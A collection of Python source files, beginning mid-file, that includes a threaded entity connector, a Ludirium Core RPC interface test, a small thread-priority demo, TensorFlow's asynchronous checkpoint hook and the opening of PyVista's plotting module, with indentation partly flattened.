if os.path.isfile(self.listfile):
status = True
        except Exception:
status = False
logger.debug(self.ref.name + '::connect(' + self.listfile + ', ' + str(self.creds) + ")=" + str(status))
return status
def my_get_entityjson(self):
self.process()
return True
def _do_function(self, entity, function, *args):
logger.debug("Executing for " + entity.ipaddr + str(*args))
(retval, fname, msg) = function(entity, *args)
        if retval:
            with self.myentitylistlock:
                self.success[function] += 1
            logger.debug("INFO: " + str(function) + " success! File=" + fname)
        else:
            with self.myentitylistlock:
                self.failed[function] += 1
            logger.debug(msg)
            logger.debug("ERROR: " + str(function) + " failed with message: " + msg['Message'])
def runit(self, function, *arguments):
logger.debug("Running: " + str(function))
with self.myentitylistlock:
if function in self.success:
logger.debug("another runit with same funciton in progress!!")
# wait
self.success[function] = 0
self.failed[function] = 0
for entity in self.entitylist:
            thr = threading.Thread(name=entity.ipaddr, \
                                   target=self._do_function, \
                                   args=(entity, function) + tuple(arguments))  # unpack so _do_function gets them positionally
self.threadlist.append(thr)
thr.start()
for t in self.threadlist:
t.join()
retval = True
fname = "<none>"
status = 'Success'
with self.myentitylistlock:
if self.success[function] == 0:
retval = False
status = 'Failed'
msg = str(self.success[function]) + " succeeded. "
msg = msg + str(self.failed[function]) + " failed."
del self.success[function]
del self.failed[function]
return (retval, fname, {'Status': status, 'Message': msg})
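    # runit() fans the given bound method out across every discovered entity
    # on its own thread, joins them all, and reports aggregate success/failure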
def get_service_tag(self):
return "TEST-FileList"
|
interface_rpc.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Ludirium Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests some generic aspects of the RPC interface."""
import os
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import LudiriumTestFramework
from test_framework.util import assert_equal, assert_greater_than_or_equal
from threading import Thread
import subprocess
def expect_http_status(expected_http_status, expected_rpc_code,
fcn, *args):
try:
fcn(*args)
raise AssertionError("Expected RPC error %d, got none" % expected_rpc_code)
except JSONRPCException as exc:
assert_equal(exc.error["code"], expected_rpc_code)
assert_equal(exc.http_status, expected_http_status)
def test_work_queue_getblock(node, got_exceeded_error):
while not got_exceeded_error:
try:
node.cli('getrpcinfo').send_cli()
except subprocess.CalledProcessError as e:
assert_equal(e.output, 'error: Server response: Work queue depth exceeded\n')
got_exceeded_error.append(True)
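# The helper above hammers the node with getrpcinfo calls from several threads
# (see test_work_queue_exceeded below); with -rpcworkqueue=1 and -rpcthreads=1
# the server must eventually refuse a request, which surfaces as the
# "Work queue depth exceeded" CLI error the helper asserts on.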
class RPCInterfaceTest(LudiriumTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def test_getrpcinfo(self):
self.log.info("Testing getrpcinfo...")
info = self.nodes[0].getrpcinfo()
assert_equal(len(info['active_commands']), 1)
command = info['active_commands'][0]
assert_equal(command['method'], 'getrpcinfo')
assert_greater_than_or_equal(command['duration'], 0)
assert_equal(info['logpath'], os.path.join(self.nodes[0].datadir, self.chain, 'debug.log'))
def test_batch_request(self):
self.log.info("Testing basic JSON-RPC batch request...")
results = self.nodes[0].batch([
# A basic request that will work fine.
{"method": "getblockcount", "id": 1},
# Request that will fail. The whole batch request should still
# work fine.
{"method": "invalidmethod", "id": 2},
# Another call that should succeed.
{"method": "getblockhash", "id": 3, "params": [0]},
])
result_by_id = {}
for res in results:
result_by_id[res["id"]] = res
assert_equal(result_by_id[1]['error'], None)
assert_equal(result_by_id[1]['result'], 0)
assert_equal(result_by_id[2]['error']['code'], -32601)
assert_equal(result_by_id[2]['result'], None)
assert_equal(result_by_id[3]['error'], None)
assert result_by_id[3]['result'] is not None
def test_http_status_codes(self):
self.log.info("Testing HTTP status codes for JSON-RPC requests...")
expect_http_status(404, -32601, self.nodes[0].invalidmethod)
expect_http_status(500, -8, self.nodes[0].getblockhash, 42)
def test_work_queue_exceeded(self):
self.log.info("Testing work queue exceeded...")
self.restart_node(0, ['-rpcworkqueue=1', '-rpcthreads=1'])
got_exceeded_error = []
threads = []
for _ in range(3):
t = Thread(target=test_work_queue_getblock, args=(self.nodes[0], got_exceeded_error))
t.start()
threads.append(t)
for t in threads:
t.join()
def run_test(self):
self.test_getrpcinfo()
self.test_batch_request()
self.test_http_status_codes()
self.test_work_queue_exceeded()
if __name__ == '__main__':
RPCInterfaceTest().main()
|
Core.py
|
import threading
class Core:
    def __init__(self):
        self.threads = []
    def add_process(self, function_called_object, process_priority, process_name, thread_name=None):
        # process_name is accepted but currently unused
        if not thread_name:
            thread_name = function_called_object.__name__
        process_object = {
            'name': thread_name,
            'priority': process_priority,
            # pass the callable itself; calling it here would run it
            # synchronously and hand Thread its return value (None) as target
            'thread': threading.Thread(target=function_called_object, name=thread_name)
        }
        process_object['thread'].start()
        self.threads.append(process_object)
    def sort_by_priority(self):
        # dicts are not orderable, so sort on the priority value
        self.threads.sort(key=lambda process: process['priority'])
def get_threads_names(self):
        thread_names = []
for i in self.threads:
thread_names.append(i['name'])
return thread_names
def func():
for i in range(10):
print(i)
def func2():
for i in range(10, 20):
print(i)
def func3(result):
result = 'lol'
obj = Core()
obj.add_process(function_called_object=func, process_priority=1, process_name='test', thread_name='test name')
print(obj.threads)
obj.add_process(func2, process_priority=3, process_name='test2')
obj.add_process(func2, process_priority=2, process_name='test3')
print(obj.threads)
print(obj.get_threads_names())
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from typing import Any, List, Optional, Text
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training_util
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir: Text,
save_secs: Optional[int] = None,
save_steps: Optional[int] = None,
saver: Optional[saver_lib.Saver] = None,
checkpoint_basename: Text = "model.ckpt",
scaffold: Optional[monitored_session.Scaffold] = None,
listeners: Optional[List[
basic_session_run_hooks.CheckpointSaverListener]] = None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
save_path = os.path.join(checkpoint_dir, checkpoint_basename)
logging.info("Create AsyncCheckpointSaverHook saving to path\n%s",
save_path)
if listeners:
logging.info(" with %d listener(s).", len(listeners))
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = save_path
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
self._last_checkpoint_step = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session: session_lib.Session, coord: Any):
global_step = session.run(self._global_step_tensor)
    # We write the graph and saver_def here (rather than in begin), since we
    # let other hooks change the graph and add variables in begin. The graph
    # is finalized after all begin calls.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn,
args=[self])
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context: Any): # pylint: disable=unused-argument
return session_run_hook.SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context: session_run_hook.SessionRunContext,
run_values: Any):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session: session_lib.Session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
if self._last_checkpoint_step != last_step:
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
event_pb2.SessionLog(
status=event_pb2.SessionLog.CHECKPOINT,
checkpoint_path=self._save_path), step)
for l in self._listeners:
l.after_save(session, step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
if not asynchronous:
self._last_checkpoint_step = step
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._last_checkpoint_step = step
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
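# hypothetical usage sketch (not part of this module): attach the hook to a
# TF1-style training loop so checkpoint writing overlaps with training steps.
#
#     import tensorflow.compat.v1 as tf
#     step = tf.train.get_or_create_global_step()
#     train_op = step.assign_add(1)
#     hook = AsyncCheckpointSaverHook("/tmp/ckpt", save_steps=100)
#     with tf.train.MonitoredTrainingSession(hooks=[hook]) as sess:
#         for _ in range(500):
#             sess.run(train_op)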
|
plotting.py
|
"""PyVista plotting module."""
import collections.abc
import ctypes
from functools import wraps
import io
import logging
import os
import pathlib
import platform
import textwrap
from threading import Thread
import time
from typing import Dict
import warnings
import weakref
import numpy as np
import scooby
import pyvista
from pyvista import _vtk
from pyvista.utilities import (
abstract_class,
assert_empty_kwargs,
convert_array,
get_array,
is_pyvista_dataset,
numpy_to_texture,
raise_not_matching,
wrap,
)
from ..utilities.misc import PyvistaDeprecationWarning
from ..utilities.regression import image_from_window
from ._plotting import _has_matplotlib, prepare_smooth_shading, process_opacity
from .colors import Color, get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .render_window_interactor import RenderWindowInteractor
from .renderer import Camera, Renderer
from .renderers import Renderers
from .scalar_bars import ScalarBars
from .tools import FONTS, normalize, opacity_transfer_function, parse_font_family # noqa
from .widgets import WidgetHelper
SUPPORTED_FORMATS = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
VERY_FIRST_RENDER = True # windows plotter helper
# EXPERIMENTAL: permit pyvista to kill the render window
KILL_DISPLAY = platform.system() == 'Linux' and os.environ.get('PYVISTA_KILL_DISPLAY')
if KILL_DISPLAY: # pragma: no cover
# this won't work under wayland
try:
X11 = ctypes.CDLL("libX11.so")
X11.XCloseDisplay.argtypes = [ctypes.c_void_p]
except OSError:
warnings.warn('PYVISTA_KILL_DISPLAY: Unable to load X11.\nProbably using wayland')
KILL_DISPLAY = False
def close_all():
"""Close all open/active plotters and clean up memory.
Returns
-------
bool
``True`` when all plotters have been closed.
"""
for _, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
log.addHandler(logging.StreamHandler())
def _warn_xserver(): # pragma: no cover
"""Check if plotting is supported and persist this state.
Check once and cache this value between calls. Warn the user if
plotting is not supported. Configured to check on Linux and Mac
OS since the Windows check is not quick.
"""
# disable windows check until we can get a fast way of verifying
# if windows has a windows manager (which it generally does)
if os.name == 'nt':
return
if not hasattr(_warn_xserver, 'has_support'):
_warn_xserver.has_support = pyvista.system_supports_plotting()
if not _warn_xserver.has_support:
# check if a display has been set
if 'DISPLAY' in os.environ:
return
# finally, check if using a backend that doesn't require an xserver
if pyvista.global_theme.jupyter_backend in ['ipygany', 'pythreejs']:
return
# Check if VTK has EGL support
ren_win_str = str(type(_vtk.vtkRenderWindow()))
if 'EGL' in ren_win_str or 'OSOpenGL' in ren_win_str:
return
warnings.warn(
'\n'
'This system does not appear to be running an xserver.\n'
'PyVista will likely segfault when rendering.\n\n'
        'Try starting a virtual frame buffer with xvfb, or using\n'
        '``pyvista.start_xvfb()``\n'
)
USE_SCALAR_BAR_ARGS = """
"stitle" is a depreciated keyword and will be removed in a future
release.
Use ``scalar_bar_args`` instead. For example:
scalar_bar_args={'title': 'Scalar Bar Title'}
"""
@abstract_class
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and pyvistaqt.QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
        Specify two stacked with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : color_like, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
        Window title.
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light_kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is a Light Kit (to be precise, 5 separate lights
that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
"""
mouse_position = None
click_position = None
def __init__(
self,
shape=(1, 1),
border=None,
border_color='k',
border_width=2.0,
title=None,
splitting_position=None,
groups=None,
row_weights=None,
col_weights=None,
lighting='light kit',
theme=None,
):
"""Initialize base plotter."""
log.debug('BasePlotter init start')
self._theme = pyvista.themes.DefaultTheme()
if theme is None:
# copy global theme to ensure local plot theme is fixed
# after creation.
self._theme.load_theme(pyvista.global_theme)
else:
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError(
'Expected ``pyvista.themes.DefaultTheme`` for '
f'``theme``, not {type(theme).__name__}.'
)
self._theme.load_theme(theme)
self.image_transparent_background = self._theme.transparent_background
# optional function to be called prior to closing
self.__before_close_callback = None
self._store_image = False
self.mesh = None
if title is None:
title = self._theme.title
self.title = str(title)
# add renderers
self.renderers = Renderers(
self,
shape,
splitting_position,
row_weights,
col_weights,
groups,
border,
border_color,
border_width,
)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bars = ScalarBars(self)
# track if the camera has been set up
self._first_time = True
# Keep track of the scale
# track if render window has ever been rendered
self._rendered = False
# this helps managing closed plotters
self._closed = False
# lighting style; be forgiving with input (accept underscores
# and ignore case)
lighting_normalized = str(lighting).replace('_', ' ').lower()
if lighting_normalized == 'light kit':
self.enable_lightkit()
elif lighting_normalized == 'three lights':
self.enable_3_lights()
elif lighting_normalized != 'none':
raise ValueError(f'Invalid lighting option "{lighting}".')
# Add self to open plotters
self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}"
_ALL_PLOTTERS[self._id_name] = self
# Key bindings
self.reset_key_events()
log.debug('BasePlotter init stop')
self._image_depth_null = None
self.last_image_depth = None
self.last_image = None
self._has_background_layer = False
# set hidden line removal based on theme
if self.theme.hidden_line_removal:
self.enable_hidden_line_removal()
# set antialiasing based on theme
if self.theme.antialiasing:
self.enable_anti_aliasing()
@property
def theme(self):
"""Return or set the theme used for this plotter.
Examples
--------
Use the dark theme for a plotter.
>>> import pyvista
>>> from pyvista import themes
>>> pl = pyvista.Plotter()
>>> pl.theme = themes.DarkTheme()
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.show()
"""
return self._theme
@theme.setter
def theme(self, theme):
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError(
'Expected a pyvista theme like '
'``pyvista.themes.DefaultTheme``, '
f'not {type(theme).__name__}.'
)
self._theme.load_theme(theme)
def import_gltf(self, filename, set_camera=True):
"""Import a glTF file into the plotter.
See https://www.khronos.org/gltf/ for more information.
Parameters
----------
filename : str
Path to the glTF file.
set_camera : bool, optional
Set the camera viewing angle to one compatible with the
default three.js perspective (``'xy'``).
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> helmet_file = examples.gltf.download_damaged_helmet() # doctest:+SKIP
>>> texture = examples.hdr.download_dikhololo_night() # doctest:+SKIP
>>> pl = pyvista.Plotter() # doctest:+SKIP
>>> pl.import_gltf(helmet_file) # doctest:+SKIP
        >>> pl.set_environment_texture(texture)  # doctest:+SKIP
>>> pl.camera.zoom(1.8) # doctest:+SKIP
>>> pl.show() # doctest:+SKIP
See :ref:`load_gltf` for a full example using this method.
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
filename = os.path.abspath(os.path.expanduser(str(filename)))
if not os.path.isfile(filename):
raise FileNotFoundError(f'Unable to locate {filename}')
# lazy import here to avoid importing unused modules
from vtkmodules.vtkIOImport import vtkGLTFImporter
importer = vtkGLTFImporter()
importer.SetFileName(filename)
importer.SetRenderWindow(self.ren_win)
importer.Update()
# register last actor in actors
actor = self.renderer.GetActors().GetLastItem()
name = actor.GetAddressAsString("")
self.renderer._actors[name] = actor
# set camera position to a three.js viewing perspective
if set_camera:
self.camera_position = 'xy'
def export_html(self, filename):
"""Export this plotter as an interactive scene to a HTML file.
Parameters
----------
filename : str
Path to export the html file to.
Notes
-----
You will need ``ipywidgets`` and ``pythreejs`` installed for
this feature.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_uniform()
>>> pl = pyvista.Plotter(shape=(1,2))
>>> _ = pl.add_mesh(mesh, scalars='Spatial Point Data', show_edges=True)
>>> pl.subplot(0,1)
>>> _ = pl.add_mesh(mesh, scalars='Spatial Cell Data', show_edges=True)
>>> pl.export_html('pyvista.html') # doctest:+SKIP
"""
pythreejs_renderer = self.to_pythreejs()
# import after converting as we check for pythreejs import first
try:
from ipywidgets.embed import embed_minimal_html
except ImportError: # pragma: no cover
raise ImportError('Please install ipywidgets with:\n' '\n\tpip install ipywidgets')
# convert and write to file
embed_minimal_html(filename, views=[pythreejs_renderer], title=self.title)
def to_pythreejs(self):
"""Convert this plotting scene to a pythreejs renderer.
Returns
-------
ipywidgets.Widget
Widget containing pythreejs renderer.
"""
self._on_first_render_request() # set up camera
from pyvista.jupyter.pv_pythreejs import convert_plotter
return convert_plotter(self)
def export_gltf(self, filename, inline_data=True, rotate_scene=True, save_normals=True):
"""Export the current rendering scene as a glTF file.
Visit https://gltf-viewer.donmccurdy.com/ for an online viewer.
See https://vtk.org/doc/nightly/html/classvtkGLTFExporter.html
for limitations regarding the exporter.
Parameters
----------
filename : str
Path to export the gltf file to.
inline_data : bool, optional
            Sets whether the binary data is included in the json file as a
base64 string. When ``True``, only one file is exported.
rotate_scene : bool, optional
Rotate scene to be compatible with the glTF specifications.
save_normals : bool, optional
Saves the point array ``'Normals'`` as ``'NORMALS'`` in
            the exported scene.
Examples
--------
Output a simple point cloud represented as balls.
>>> import numpy as np
>>> import pyvista
>>> point_cloud = np.random.random((100, 3))
>>> pdata = pyvista.PolyData(point_cloud)
>>> pdata['orig_sphere'] = np.arange(100)
>>> sphere = pyvista.Sphere(radius=0.02)
>>> pc = pdata.glyph(scale=False, geom=sphere)
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pc, cmap='reds', smooth_shading=True,
... show_scalar_bar=False)
>>> pl.export_gltf('balls.gltf') # doctest:+SKIP
>>> pl.show()
Output the orientation plotter.
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.export_gltf('orientation_plotter.gltf') # doctest:+SKIP
>>> pl.show()
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
if not hasattr(self, "ren_win"):
raise RuntimeError('This plotter has been closed and is unable to export the scene.')
from vtkmodules.vtkIOExport import vtkGLTFExporter
# rotate scene to gltf compatible view
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateX(-90)
actor.RotateZ(-90)
if save_normals:
try:
mapper = actor.GetMapper()
if mapper is None:
continue
dataset = mapper.GetInputAsDataSet()
if 'Normals' in dataset.point_data:
# ensure normals are active
normals = dataset.point_data['Normals']
dataset.point_data.active_normals = normals.copy()
except: # noqa: E722
pass
exporter = vtkGLTFExporter()
exporter.SetRenderWindow(self.ren_win)
exporter.SetFileName(filename)
exporter.SetInlineData(inline_data)
exporter.SetSaveNormal(save_normals)
exporter.Update()
# rotate back if applicable
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateZ(90)
actor.RotateX(90)
def enable_hidden_line_removal(self, all_renderers=True):
"""Enable hidden line removal.
Wireframe geometry will be drawn using hidden line removal if
the rendering engine supports it.
Disable this with :func:`disable_hidden_line_removal
<BasePlotter.disable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Create a side-by-side plotter and render a sphere in wireframe
with hidden line removal enabled on the left and disabled on
the right.
>>> import pyvista
>>> sphere = pyvista.Sphere(theta_resolution=20, phi_resolution=20)
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("With hidden line removal")
>>> pl.enable_hidden_line_removal(all_renderers=False)
>>> pl.subplot(0, 1)
>>> pl.disable_hidden_line_removal(all_renderers=False)
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("Without hidden line removal")
>>> pl.show()
"""
if all_renderers:
for renderer in self.renderers:
renderer.enable_hidden_line_removal()
else:
self.renderer.enable_hidden_line_removal()
def disable_hidden_line_removal(self, all_renderers=True):
"""Disable hidden line removal.
Enable again with :func:`enable_hidden_line_removal
<BasePlotter.enable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Enable and then disable hidden line removal.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.enable_hidden_line_removal()
>>> pl.disable_hidden_line_removal()
"""
if all_renderers:
for renderer in self.renderers:
renderer.disable_hidden_line_removal()
else:
self.renderer.disable_hidden_line_removal()
@property
def scalar_bar(self):
"""First scalar bar. Kept for backwards compatibility."""
return list(self.scalar_bars.values())[0]
@property
def scalar_bars(self):
"""Scalar bars.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> plotter.scalar_bars
Scalar Bar Title Interactive
"Data" False
Select a scalar bar actor based on the title of the bar.
>>> plotter.scalar_bars['Data'] # doctest:+SKIP
(vtkmodules.vtkRenderingAnnotation.vtkScalarBarActor)0x7fcd3567ca00
"""
return self._scalar_bars
@property
def _before_close_callback(self):
"""Return the cached function (expecting a reference)."""
if self.__before_close_callback is not None:
return self.__before_close_callback()
@_before_close_callback.setter
def _before_close_callback(self, func):
"""Store a weakref.ref of the function being called."""
if func is not None:
self.__before_close_callback = weakref.ref(func)
else:
self.__before_close_callback = None
@property
def shape(self):
"""Shape of the plotter.
Examples
--------
Return the plotter shape.
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(2, 2))
>>> plotter.shape
(2, 2)
"""
return self.renderers._shape
@property
def renderer(self):
"""Return the active renderer.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.renderer # doctest:+SKIP
(Renderer)0x7f916129bfa0
"""
return self.renderers.active_renderer
@property
def store_image(self):
"""Store last rendered frame on close.
This is normally disabled to avoid caching the image, and is
        enabled when building the documentation gallery by setting
        ``pyvista.BUILDING_GALLERY = True``.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter(off_screen=True)
>>> pl.store_image = True
>>> _ = pl.add_mesh(pyvista.Cube())
>>> pl.show()
>>> image = pl.last_image
>>> type(image) # doctest:+SKIP
<class 'numpy.ndarray'>
"""
return self._store_image
@store_image.setter
def store_image(self, value):
"""Store last rendered frame on close."""
self._store_image = bool(value)
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
Examples
--------
Create a 2 wide plot and set the background of right-hand plot
to orange. Add a cube to the left plot and a sphere to the
right.
>>> import pyvista
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> actor = pl.add_mesh(pyvista.Cube())
>>> pl.subplot(0, 1)
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.set_background('orange', all_renderers=False)
>>> pl.show()
"""
self.renderers.set_active_renderer(index_row, index_column)
@wraps(Renderer.add_legend)
def add_legend(self, *args, **kwargs):
"""Wrap ``Renderer.add_legend``."""
return self.renderer.add_legend(*args, **kwargs)
@wraps(Renderer.remove_legend)
def remove_legend(self, *args, **kwargs):
"""Wrap ``Renderer.remove_legend``."""
return self.renderer.remove_legend(*args, **kwargs)
@property
def legend(self):
"""Legend actor.
There can only be one legend actor per renderer. If
``legend`` is ``None``, there is no legend actor.
"""
return self.renderer.legend
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
def enable_3_lights(self, only_active=False):
"""Enable 3-lights illumination.
This will replace all pre-existing lights in the scene.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default
is that every renderer is affected.
Examples
--------
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.enable_3_lights()
>>> pl.show()
Note how this varies from the default plotting.
>>> pl = demos.orientation_plotter()
>>> pl.show()
"""
def _to_pos(elevation, azimuth):
theta = azimuth * np.pi / 180.0
phi = (90.0 - elevation) * np.pi / 180.0
x = np.sin(theta) * np.sin(phi)
y = np.cos(phi)
z = np.cos(theta) * np.sin(phi)
return x, y, z
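        # e.g. _to_pos(45.0, 45.0) is a unit direction pointing up and to the
        # side in camera coordinates; the three lights below use such
        # positions with decreasing intensity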
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
        # Inspired by Mayavi's version of Raymond Maple's 3-lights illumination
intensities = [1, 0.6, 0.5]
all_angles = [(45.0, 45.0), (-30.0, -60.0), (-30.0, 60.0)]
for intensity, angles in zip(intensities, all_angles):
light = pyvista.Light(light_type='camera light')
light.intensity = intensity
light.position = _to_pos(*angles)
for renderer in renderers:
renderer.add_light(light)
def disable_3_lights(self):
"""Please use ``enable_lightkit``, this method has been depreciated."""
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``enable_lightkit``')
def enable_lightkit(self, only_active=False):
"""Enable the default light-kit lighting.
See:
https://www.researchgate.net/publication/2926068
This will replace all pre-existing lights in the renderer.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default is that
every renderer is affected.
Examples
--------
Create a plotter without any lights and then enable the
default light kit.
>>> import pyvista
>>> pl = pyvista.Plotter(lighting=None)
